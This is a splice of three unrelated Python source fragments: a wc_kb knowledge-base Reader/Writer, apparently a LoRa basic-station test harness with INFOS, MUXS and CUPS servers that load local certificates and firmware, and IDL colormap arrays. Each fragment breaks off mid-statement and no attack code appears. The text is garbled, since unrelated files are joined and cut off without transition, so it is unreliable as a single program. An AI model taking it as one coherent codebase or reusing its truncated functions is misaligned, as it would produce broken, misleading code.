get_related (:obj:`bool`, optional): if :obj:`True`, write object and all related objects
include_all_attributes (:obj:`bool`, optional): if :obj:`True`, export all attributes including those
not explictly included in `Model.Meta.attribute_order`
validate (:obj:`bool`, optional): if :obj:`True`, validate the data
title (:obj:`str`, optional): title
description (:obj:`str`, optional): description
keywords (:obj:`str`, optional): keywords
version (:obj:`str`, optional): version
language (:obj:`str`, optional): language
creator (:obj:`str`, optional): creator
write_schema (:obj:`bool`, optional): if :obj:`True`, include additional worksheet with schema
write_toc (:obj:`bool`, optional): if :obj:`True`, include additional worksheet with table of contents
extra_entries (:obj:`int`, optional): additional entries to display
data_repo_metadata (:obj:`bool`, optional): if :obj:`True`, try to write metadata information
about the file's Git repo; the repo must be current with origin, except for the file
schema_package (:obj:`str`, optional): the package which defines the `obj_tables` schema
used by the file; if not :obj:`None`, try to write metadata information about the
the schema's Git repository: the repo must be current with origin
protected (:obj:`bool`, optional): if :obj:`True`, protect the worksheet
Raises:
:obj:`ValueError`: if any of the relationships with knowledge bases and cells are not set
"""
if issubclass(self.get_writer(core_path), obj_tables.io.WorkbookWriter):
self.validate_implicit_relationships()
self.validate_implicit_relationships_are_set(knowledge_base)
if taxon == 'prokaryote':
models = PROKARYOTE_MODELS
elif taxon == 'eukaryote':
models = EUKARYOTE_MODELS
# default metadata for exported file
if title is None:
title = knowledge_base.id
if description is None:
description = knowledge_base.name
if version is None:
version = knowledge_base.version
if language is None:
language = 'wc_kb'
if creator is None:
creator = '{}.{}'.format(self.__class__.__module__, self.__class__.__name__)
# export sequences, if a path is provided
if seq_path:
dna_seqs = []
original_seq_paths = []
if knowledge_base.cell:
dna_species_types = knowledge_base.cell.species_types.get(
__type=core.DnaSpeciesType)
for species_type in dna_species_types:
dna_seqs.append(Bio.SeqRecord.SeqRecord(
species_type.get_seq(), species_type.id))
if rewrite_seq_path:
original_seq_paths.append((species_type, species_type.sequence_path))
species_type.sequence_path = seq_path
with open(seq_path, 'w') as file:
writer = Bio.SeqIO.FastaIO.FastaWriter(
file, wrap=70, record2title=lambda record: record.id)
writer.write_file(dna_seqs)
file.close()
# export core
super(Writer, self).run(core_path, knowledge_base, schema_name='wc_kb.' + taxon, models=models, get_related=get_related,
include_all_attributes=include_all_attributes, validate=validate,
title=title, description=description, version=version, language=language,
creator=creator,
write_schema=write_schema, write_toc=write_toc, extra_entries=extra_entries,
data_repo_metadata=data_repo_metadata, schema_package=schema_package,
protected=protected)
# reset sequence paths
if seq_path and rewrite_seq_path:
for species_type, path in original_seq_paths:
species_type.sequence_path = path
@classmethod
def validate_implicit_relationships(cls):
""" Check that relationships to :obj:`core.KnowledgeBase` and :obj:`core.Cell` do not need to be explicitly written to
workbooks because they can be inferred by :obj:`Reader.run`
Raises:
:obj:`Exception`: if the Excel serialization involves an unsupported implicit relationship
"""
for name, attr in core.KnowledgeBase.Meta.attributes.items():
if isinstance(attr, obj_tables.RelatedAttribute):
raise Exception(
"Relationships from `KnowledgeBase` not supported: {}.{} to {}".format(
'KnowledgeBase', name, attr.related_class.__name__))
for name, attr in core.KnowledgeBase.Meta.related_attributes.items():
if not isinstance(attr, obj_tables.OneToOneAttribute):
raise Exception(
"Relationships to `KnowledgeBase` that are not one-to-one are prohibited: {}.{} to {}".format(
attr.related_class.__name__, name, 'KnowledgeBase'))
for name, attr in core.Cell.Meta.attributes.items():
if isinstance(attr, obj_tables.RelatedAttribute):
if not isinstance(attr, obj_tables.OneToOneAttribute):
raise Exception(
"Relationships from `Cell` to `KnowledgeBase` that are not one-to-one are prohibited: {}.{} to {}".format(
'Cell', name, 'KnowledgeBase'))
if attr.related_class != core.KnowledgeBase:
raise Exception(
"Relationships from `Cell` to classes other than `KnowledgeBase` are prohibited: {}.{} to {}".format(
'Cell', name, attr.related_class.__name__))
for attr in core.Cell.Meta.related_attributes.values():
if not isinstance(attr, (obj_tables.OneToOneAttribute, obj_tables.ManyToOneAttribute)):
raise Exception(
"Relationships to `Cell` that are not one-to-one or many-to-one are prohibited: {}.{} to {}".format(
attr.related_class.__name__, attr.related_name, 'Cell'))
for name, attr in core.KnowledgeBase.Meta.related_attributes.items():
if attr.primary_class != core.Cell:
raise Exception(
"Relationships to `KnowledgeBase` from classes other than `Cell` are prohibited: {}.{} to {}".format(
attr.related_class.__name__, name, 'KnowledgeBase'))
return None # pragma: no cover; avoids missing branch coverage on previous for loop
def validate_implicit_relationships_are_set(self, knowledge_base):
""" Check that there is only 1 :obj:`KnowledgeBase` and <= 1 :obj:`Cell` and that each relationship
to :obj:`KnowledgeBase` and :obj:`Cell` is set. This is necessary to enable the :obj:`KnowledgeBase` and
:obj:`Cell` relationships to be implicit in the Excel output and added by :obj:`Reader.run`
Args:
knowledge_base (:obj:`core.KnowledgeBase`): knowledge base
Raises:
:obj:`ValueError`: if there are multiple instances of :obj:`core.KnowledgeBase` in the object graph
"""
cell = knowledge_base.cell
for obj in knowledge_base.get_related():
for attr in obj.Meta.attributes.values():
if isinstance(attr, obj_tables.RelatedAttribute) and attr.related_class == core.Cell:
val = getattr(obj, attr.name)
if val is None or val != cell:
raise ValueError('{}.{} must be set to the instance of `Cell`'.format(
obj.__class__.__name__, attr.name))
class Reader(obj_tables.io.Reader):
""" Read knowledge base from file(s) """
def run(self, core_path,
seq_path='', rewrite_seq_path=True, taxon='prokaryote',
models=None, ignore_missing_models=None, ignore_extra_models=None, ignore_sheet_order=None,
include_all_attributes=False, ignore_missing_attributes=None, ignore_extra_attributes=None, ignore_attribute_order=None,
group_objects_by_model=True, validate=True, read_metadata=False):
""" Read knowledge base from file(s)
Args:
core_path (:obj:`str`): path to core knowledge base
seq_path (:obj:`str`): path to genome sequence
rewrite_seq_path (:obj:`bool`, optional): if :obj:`True`, the path to genome sequence in the knowledge base
will be updated to the provided seq_path
taxon (:obj:`str`, optional): type of model order to use
models (:obj:`types.TypeType` or :obj:`list` of :obj:`types.TypeType`, optional): type
of object to read or list of types of objects to read
ignore_missing_models (:obj:`bool`, optional): if :obj:`False`, report an error if a worksheet/
file is missing for one or more models
ignore_extra_models (:obj:`bool`, optional): if :obj:`True` and all `models` are found, ignore
other worksheets or files
ignore_sheet_order (:obj:`bool`, optional): if :obj:`True`, do not require the sheets to be provided
in the canonical order
include_all_attributes (:obj:`bool`, optional): if :obj:`True`, export all attributes including those
not explictly included in `Model.Meta.attribute_order`
ignore_missing_attributes (:obj:`bool`, optional): if :obj:`False`, report an error if a
worksheet/file doesn't contain all of attributes in a model in `models`
ignore_extra_attributes (:obj:`bool`, optional): if :obj:`True`, do not report errors if
attributes in the data are not in the model
ignore_attribute_order (:obj:`bool`): if :obj:`True`, do not require the attributes to be provided
in the canonical order
group_objects_by_model (:obj:`bool`, optional): if :obj:`True`, group decoded objects by their
types
validate (:obj:`bool`, optional): if :obj:`True`, validate the data
read_metadata (:obj:`bool`, optional): if :obj:`True`, read metadata models
Returns:
:obj:`dict`: model objects grouped by `obj_tables.Model` class
Raises:
:obj:`ValueError`: if :obj:`core_path`
* Defines multiple knowledge bases or cells
* Represents objects that cannot be linked to a knowledge base and/or cell
"""
if issubclass(self.get_reader(core_path), obj_tables.io.WorkbookReader):
Writer.validate_implicit_relationships()
if taxon == 'prokaryote':
models = PROKARYOTE_MODELS
elif taxon == 'eukaryote':
models = EUKARYOTE_MODELS
else:
raise ValueError('Unsupported taxon "{}"'.format(taxon))
if read_metadata:
models = list(models) + [obj_tables.utils.DataRepoMetadata, obj_tables.utils.SchemaRepoMetadata]
ignore_missing_models = True
ignore_sheet_order = True
config = wc_kb.config.core.get_config()['wc_kb']['io']
if ignore_missing_models is None:
ignore_missing_models = not config['strict']
if ignore_extra_models is None:
ignore_extra_models = not config['strict']
if ignore_sheet_order is None:
ignore_sheet_order = not config['strict']
if ignore_missing_attributes is None:
ignore_missing_attributes = not config['strict']
if ignore_extra_attributes is None:
ignore_extra_attributes = not config['strict']
if ignore_attribute_order is None:
ignore_attribute_order = not config['strict']
# read core objects from file
objects = super(Reader, self).run(core_path, schema_name='wc_kb.' + taxon, models=models,
ignore_missing_models=ignore_missing_models,
ignore_extra_models=ignore_extra_models,
ignore_sheet_order=ignore_sheet_order,
include_all_attributes=include_all_attributes,
ignore_missing_attributes=ignore_missing_attributes,
ignore_extra_attributes=ignore_extra_attributes,
ignore_attribute_order=ignore_attribute_order,
group_objects_by_model=True,
validate=False)
# Check if sequence pathes are consistent
for idx, chromosome in enumerate(objects[wc_kb.core.DnaSpeciesType]):
if (chromosome.sequence_path is None) or (chromosome.sequence_path == ''):
chromosome.sequence_path = seq_path # Set seq_path to be what is provided to wc_kb.io.Reader()
if idx != 0:
warnings.warn('Same sequence file is associated | |
# --- Revised 3-Clause BSD License ---
# Copyright (C) 2016-2019, SEMTECH (International) AG.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL SEMTECH BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import Any,Dict,List,Optional,Tuple
import time
import re
import base64
import os
import struct
import json
import asyncio
import aiohttp
from aiohttp import web
import websockets
import ssl
from zlib import crc32
import logging
from id6 import Id6
import glob
logger = logging.getLogger('test')
router_config_EU863_6ch = {
'DRs': [[12, 125, 0],
[11, 125, 0],
[10, 125, 0],
[9, 125, 0],
[8, 125, 0],
[7, 125, 0],
[7, 250, 0],
[0, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0],
[-1, 0, 0]],
'JoinEui': None,
'NetID': None,
'bcning': None,
'config': {},
'nodc': True,
'freq_range': [863000000, 870000000],
'hwspec': 'sx1301/1',
'max_eirp': 16.0,
'msgtype': 'router_config',
'protocol': 1,
'region': 'EU863',
'regionid': 1002,
'sx1301_conf': [{'chan_FSK': {'enable': False},
'chan_Lora_std': {'enable': False},
'chan_multiSF_0': {'enable': True, 'if': -375000, 'radio': 0},
'chan_multiSF_1': {'enable': True, 'if': -175000, 'radio': 0},
'chan_multiSF_2': {'enable': True, 'if': 25000, 'radio': 0},
'chan_multiSF_3': {'enable': True, 'if': 375000, 'radio': 0},
'chan_multiSF_4': {'enable': True, 'if': -237500, 'radio': 1},
'chan_multiSF_5': {'enable': True, 'if': 237500, 'radio': 1},
'chan_multiSF_6': {'enable': False},
'chan_multiSF_7': {'enable': False},
'radio_0': {'enable': True, 'freq': 868475000},
'radio_1': {'enable': True, 'freq': 869287500}}],
'upchannels': [[868100000, 0, 5],
[868300000, 0, 5],
[868500000, 0, 5],
[868850000, 0, 5],
[869050000, 0, 5],
[869525000, 0, 5]]
}
router_config_KR920 = {
'DRs': [(12, 125, 0),
(11, 125, 0),
(10, 125, 0),
(9, 125, 0),
(8, 125, 0),
(7, 125, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0),
(-1, 0, 0)],
'JoinEui': None,
'NetID': None,
'bcning': None,
'config': {},
'freq_range': [920900000, 923300000],
'hwspec': 'sx1301/1',
'max_eirp': 23.0,
'msgtype': 'router_config',
'protocol': 1,
'region': 'KR920',
'regionid': 8,
'sx1301_conf': [{'chan_FSK': {'enable': False},
'chan_Lora_std': {'enable': False},
'chan_multiSF_0': {'enable': True, 'if': -200000, 'radio': 0},
'chan_multiSF_1': {'enable': True, 'if': 0, 'radio': 0},
'chan_multiSF_2': {'enable': True, 'if': 200000, 'radio': 0},
'chan_multiSF_3': {'enable': False},
'chan_multiSF_4': {'enable': False},
'chan_multiSF_5': {'enable': False},
'chan_multiSF_6': {'enable': False},
'chan_multiSF_7': {'enable': False},
'radio_0': {'enable': True, 'freq': 922300000},
'radio_1': {'enable': False, 'freq': 0}}],
'upchannels': [(922100000, 0, 5),
(922300000, 0, 5),
(922500000, 0, 5)]
}
class ServerABC:
def __init__(self, port:int=6000, tlsidentity:Optional[str]=None, tls_no_ca=False):
self.server = None
self.ws = None
self.port = port
self.tls_no_ca = tls_no_ca
self.tlsctx = self.make_tlsctx(tlsidentity)
def make_tlsctx(self, tlsidentity:Optional[str]):
if tlsidentity is None:
return {}
tlsctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
tlsctx.load_verify_locations(tlsidentity+'.trust')
crtfile = tlsidentity+'.crt'
keyfile = tlsidentity+'.key'
tlsctx.load_cert_chain(crtfile, keyfile)
if not self.tls_no_ca:
tlsctx.verify_mode = ssl.CERT_REQUIRED
return { 'ssl':tlsctx }
async def start_server(self):
self.server = await websockets.serve(self.handle_ws, host='0.0.0.0', port=self.port, **self.tlsctx)
async def handle_ws(self, ws, path):
pass
class Infos(ServerABC):
def __init__(self, muxsuri='ws://localhost:6039/router', tlsidentity:Optional[str]=None, tls_no_ca=False):
super().__init__(port=6038, tlsidentity=tlsidentity, tls_no_ca=tls_no_ca)
print(" INFOS port %d" %(self.port))
self.muxsuri = muxsuri
async def handle_ws(self, ws, path):
print('. INFOS connect: %s from %r' % (path, ws.remote_address))
try:
while True:
msg = json.loads(await ws.recv())
print('> INFOS: %r' % msg);
r = msg['router']
resp = {
'router': r,
'muxs' : 'muxs-::0',
'uri' : self.muxsuri,
}
resp = self.router_info_response(resp)
await ws.send(json.dumps(resp))
print('< INFOS: %r' % resp);
except websockets.exceptions.ConnectionClosed as exc:
if exc.code != 1000:
logger.error('x INFOS close: code=%d reason=%r', exc.code, exc.reason)
except Exception as exc:
logger.error('x INFOS exception: %s', exc, exc_info=True)
try:
ws.close()
except: pass
def router_info_response(self, resp):
return resp
class Muxs(ServerABC):
def __init__(self, tlsidentity:Optional[str]=None, tls_no_ca=False):
super().__init__(port=6039, tlsidentity=tlsidentity, tls_no_ca=tls_no_ca)
print(" MUXS port %d" %(self.port))
self.router_config = router_config_EU863_6ch
async def handle_ws(self, ws, path):
print('. MUXS connect: %s' % (path,))
if path != '/router':
await ws.close(1020)
rconf = self.get_router_config()
await ws.send(json.dumps(rconf))
print('< MUXS: router_config.')
await asyncio.sleep(0.1) # give station some time to setup radio/timesync
await self.handle_connection(ws)
def get_router_config(self):
return { **self.router_config, 'MuxTime': time.time() }
async def handle_binaryData(self, ws, data:bytes) -> None:
pass
async def handle_connection(self, ws):
try:
while True:
msgtxt = await ws.recv()
#print('MUXS raw recv: %r' % (msgtxt,))
if isinstance(msgtxt, bytes):
await self.handle_binaryData(ws, msgtxt)
continue
msg = json.loads(msgtxt)
print('> MUXS: %r' % (msg,))
msgtype = msg.get('msgtype')
if msgtype:
fn = getattr(self, 'handle_'+msgtype, None)
if fn:
await fn(ws, msg)
continue
print(' MUXS: ignored msgtype: %s\n%r' % (msgtype, msg))
except (asyncio.CancelledError, SystemExit):
raise
except websockets.exceptions.ConnectionClosed as exc:
if exc.code != 1000:
logger.error('x MUXS close: code=%d reason=%r', exc.code, exc.reason)
except Exception as exc:
logger.error('x MUXS exception: %s', exc, exc_info=True)
try:
ws.close()
except: pass
async def handle_version(self, ws, msg):
print('> MUXS: Station Version: %r' % (msg,))
class Cups(ServerABC):
def __init__(self, tlsidentity:Optional[str]=None, tls_no_ca=False):
super().__init__(port=6040, tlsidentity=tlsidentity, tls_no_ca=tls_no_ca)
self.app = web.Application()
print(" CUPS port %d" %(self.port))
for args in [ ('POST', '/update-info', self.handle_update_info), ]:
self.app.router.add_route(*args)
async def start_server(self):
handler = self.app.make_handler()
self.server = await self.app.loop.create_server(handler, host='0.0.0.0', port=self.port, **self.tlsctx)
LEND=b'\\s*\r?\n'
PEM_REX = re.compile(b'-+BEGIN (?P<key>[^-]+)-+' + LEND +
b'(([0-9A-Za-z+/= ]+' + LEND + b')+)' +
b'-+END (?P=key)-+' + LEND)
# Since router and cups compare CRCs it is crucial that input to the CRC process
# is excatly the same. Therefore, normalize according the rules below.
#
# E.g. resilient again pasting or editing one the files
# and thereby introducing white space triggered changes the CRC.
def normalizePEM(self, data:bytes, fmt="PEM") -> List[bytes]:
norm = []
for pem in Cups.PEM_REX.finditer(data):
if fmt == "DER":
out = base64.b64decode(re.sub(Cups.LEND, b'\n', pem.group(2)))
#out += b'\x00' * (4-len(out)&3)
else:
out = re.sub(Cups.LEND, b'\n', pem.group(0))
norm.append(out)
return norm
def rdPEM(self, fn, fmt="PEM"):
if not os.path.exists(fn):
return b''
with open(fn,'rb') as f:
return self.normalizePEM(f.read(), fmt)[0]
def normalizeId (self, id:Any) -> str:
# For tests use a shorter representation
# For production use str(Id6(id))
return str(Id6(id).id)
def readCupsCred(self, routerid, fmt="PEM"):
return (self.rdPEM('cups.ca', fmt) +
self.rdPEM('cups-router-%s.crt' % routerid, fmt) +
self.rdPEM('cups-router-%s.key' % routerid, fmt))
def readTcCred(self, routerid, fmt="PEM"):
return (self.rdPEM('tc.ca', fmt) +
self.rdPEM('tc-router-%s.crt' % routerid, fmt) +
self.rdPEM('tc-router-%s.key' % routerid, fmt))
def readRouterConfig(self, id:str) -> Dict[str,Any]:
with open('cups-router-%s.cfg' % id) as f:
d = json.loads(f.read())
version = d['version']
with open(version+'.bin', 'rb') as f:
fwBin = f.read()
d['fwBin'] = fwBin
try:
d['fwSig'] = []
for sigkey in glob.iglob('sig*.key', recursive=True):
try:
with open(sigkey,'rb') as f:
key = f.read()
crc = crc32(key)
print('Key: %08X %s ' % (crc, sigkey))
sigf = version+'.bin.'+sigkey[:-4]
print(sigf)
with open(sigf, 'rb') as f:
fwSig = f.read()
print(len(fwSig))
d['fwSig'].append((crc,fwSig))
except Exception as ex:
print("Failed to process sign key %s" % sigkey)
print(ex)
except:
d['fwSig'] = [(b'', b'\x00'*4)]
d['cupsCred'] = self.readCupsCred(id, d.get("credfmt", "DER"))
d['tcCred'] = self.readTcCred(id, d.get("credfmt", "DER"))
d['cupsCredCrc'] = crc32(d['cupsCred']) & 0xFFFFFFFF
d['tcCredCrc'] = crc32(d['tcCred']) & 0xFFFFFFFF
return d
def encodeUri(self, key:str, req:Dict[str,Any], cfg:Dict[str,Any]) -> bytes:
k = key+'Uri'
if req[k] == cfg[k]:
return b'\x00'
s = cfg[k].encode('ascii')
return struct.pack('<B', len(s)) + s
def encodeCred(self, key:str, req:Dict[str,Any], cfg:Dict[str,Any]) -> bytes:
k = key+'CredCrc'
if req[k] == cfg[k]:
return b'\x00\x00'
d = cfg[key+'Cred']
return struct.pack('<H', len(d)) + d
def encodeFw(self, req:Dict[str,Any], cfg:Dict[str,Any]) -> bytes:
if req['version'] == cfg['version']:
return b'\x00\x00\x00\x00'
fwbin = cfg['fwBin']
return struct.pack('<I', len(fwbin)) + fwbin
def | |
0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250,
0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.3281250,
0.3281250, 0.3281250, 0.3281250, 0.3281250, 0.6562500, 0.6562500,
0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500,
0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500, 0.6562500,
0.6562500, 0.6562500, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250,
0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.7031250,
0.7031250, 0.7031250, 0.7031250, 0.7031250, 0.5000000, 0.5000000,
0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000,
0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000, 0.5000000,
0.5000000, 0.5000000, 0.2500000, 0.2500000, 0.2500000, 0.2500000,
0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000,
0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000, 0.2500000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.7421875, 0.7421875,
0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875,
0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875, 0.7421875,
0.7421875, 0.7421875, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750, 0.8593750,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938]),
array([ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
)
### IDL colormap 13 :: RAINBOW ###
color_map_luts['idl13'] = \
(
array([ 0.0000000, 0.0156250, 0.0351562, 0.0507812, 0.0703125, 0.0859375,
0.1054688, 0.1210938, 0.1406250, 0.1562500, 0.1757812, 0.1953125,
0.2109375, 0.2265625, 0.2382812, 0.2500000, 0.2656250, 0.2695312,
0.2812500, 0.2890625, 0.3007812, 0.3085938, 0.3125000, 0.3203125,
0.3242188, 0.3320312, 0.3281250, 0.3359375, 0.3398438, 0.3437500,
0.3359375, 0.3398438, 0.3398438, 0.3398438, 0.3320312, 0.3281250,
0.3281250, 0.3281250, 0.3242188, 0.3085938, 0.3046875, 0.3007812,
0.2968750, 0.2773438, 0.2734375, 0.2656250, 0.2578125, 0.2343750,
0.2265625, 0.2148438, 0.2070312, 0.1796875, 0.1679688, 0.1562500,
0.1406250, 0.1289062, 0.0976562, 0.0820312, 0.0625000, 0.0468750,
0.0156250, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0156250, 0.0312500, 0.0468750,
0.0820312, 0.0976562, 0.1132812, 0.1289062, 0.1640625, 0.1796875,
0.1992188, 0.2148438, 0.2460938, 0.2617188, 0.2812500, 0.2968750,
0.3125000, 0.3476562, 0.3632812, 0.3789062, 0.3945312, 0.4296875,
0.4453125, 0.4648438, 0.4804688, 0.5117188, 0.5273438, 0.5468750,
0.5625000, 0.5976562, 0.6132812, 0.6289062, 0.6445312, 0.6601562,
0.6953125, 0.7109375, 0.7304688, 0.7460938, 0.7773438, 0.7929688,
0.8125000, 0.8281250, 0.8632812, 0.8789062, 0.8945312, 0.9101562,
0.9453125, 0.9609375, 0.9765625, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938, 0.9960938,
0.9960938, 0.9960938, 0.9960938, 0.9960938]),
array([ 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000, 0.0000000,
